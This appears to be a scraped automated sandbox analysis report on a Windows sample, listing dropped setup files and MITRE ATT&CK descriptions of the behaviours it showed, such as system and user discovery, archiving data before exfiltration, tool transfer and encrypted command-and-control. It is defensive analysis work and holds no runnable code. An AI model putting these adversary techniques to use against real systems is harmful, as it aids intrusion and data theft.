C:\4863269369430a9b27\1028\LocalizedData.xml

C:\4863269369430a9b27\1028\SetupResources.dll

C:\4863269369430a9b27\1028\eula.rtf

C:\4863269369430a9b27\1031\LocalizedData.xml

C:\4863269369430a9b27\1031\SetupResources.dll

C:\4863269369430a9b27\1031\eula.rtf

C:\4863269369430a9b27\1033\LocalizedData.xml

C:\4863269369430a9b27\1033\SetupResources.dll

C:\4863269369430a9b27\1033\eula.rtf

C:\4863269369430a9b27\1036\LocalizedData.xml

C:\4863269369430a9b27\1036\SetupResources.dll

C:\4863269369430a9b27\1036\eula.rtf

Windows Analysis Report
ywvz5i8kT9

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre